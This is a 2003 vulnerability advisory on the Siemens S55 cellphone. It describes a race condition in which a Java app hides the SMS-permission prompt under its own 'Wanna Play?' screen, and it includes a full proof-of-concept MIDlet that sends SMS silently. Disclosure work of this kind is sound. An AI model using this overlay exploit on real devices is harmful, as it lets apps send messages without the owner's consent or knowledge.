Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++++>
[ Authors ]
FtR <ftr@phenoelit.de>
FX <fx@phenoelit.de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Siemens S55
Possibly others
Siemens : Not assigned
[ Vendor communication ]
09/Nov/03 Initial Notification, support@siemens.de
*Note-Initial notification by phenoelit
includes a cc to cert@cert.org by default
[ Overview ]
The Siemens S55 is a cellphone and provides a Java virtual machine
including a full featured API for additional software development
by third parties.
[ Description ]
The Java API provides the possibilty to send out SMS messages through
the Java Applications. This interface will ask for permissions to send
out the SMS by presenting a message screen.
The API also provides objects which alow a programmer to create
personal screen layouts for his applications
The vulnerability found can be described as a race condition
which allows the programmer to overlay the message which asks for
permission by his own screen craft.
The result of that vulnerability will allow any program to
send SMS to any number without notification to the user
[ Example ]
package hello;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.*;
import com.siemens.mp.game.Sound;
import com.siemens.mp.gsm.*;
import java.lang.*;
import java.io.*;
public class hello extends MIDlet implements CommandListener
{
static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
Display display;
static hello hello;
public void startApp (){
HelloCanva kanvas = new HelloCanva();
Scr2 scr2 = new Scr2();
display = Display.getDisplay(this);
// Menu
Command exitCommand = new Command(EXIT_COMMAND_LABEL ,
Command.SCREEN, 0);
scr2.addCommand(exitCommand);
scr2.setCommandListener(this);
//Data
// screen 1
display.setCurrent(kanvas);
mycall();
// screen 2
display.setCurrent(scr2);
//destroyApp(false);
}
public void mycall(){
String SMSstr= "Test";
try {
/* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
SMS.send("0170-Numder", SMSstr);
}
/* Exception handling */
catch (com.siemens.mp.NotAllowedException ex) {
// Some handling code ...
}
catch (IOException ex) {
//Some handling code ...
}
catch (IllegalArgumentException ex) {
// Some handling code ...
}
} //public viod call()
protected void destroyApp (boolean b){
display.setCurrent(null);
this.notifyDestroyed(); // notify KVM
}
protected void pauseApp ()
{ }
public void commandAction (Command c, Displayable d){
destroyApp(false);
}
}
class HelloCanva extends Canvas
{
public void paint (Graphics g)
{
String str = new String("Wanna Play?");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER
| Graphics.BASELINE);
g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35,
Graphics.HCENTER | Graphics.BASELINE);
g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35,
Graphics.HCENTER | Graphics.BASELINE);
}
}
class Scr2 extends Canvas
{
public void paint (Graphics g) {
String str = new String("cool");
g.setColor(0,0,0);
g.fillRect(0, 0, getWidth(), getHeight());
g.setColor(255,0,0);
g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER
| Graphics.BASELINE);
}
}
[ Solution ]
None known at this time.
[ end of file ]
--
#!/usr/local/bin/perl
print&f(($_=(3x3)."3+33")=~s=3(?![^3]|$)=&f=eg);
sub f{eval(@_?$_:"'$&+'x3");}
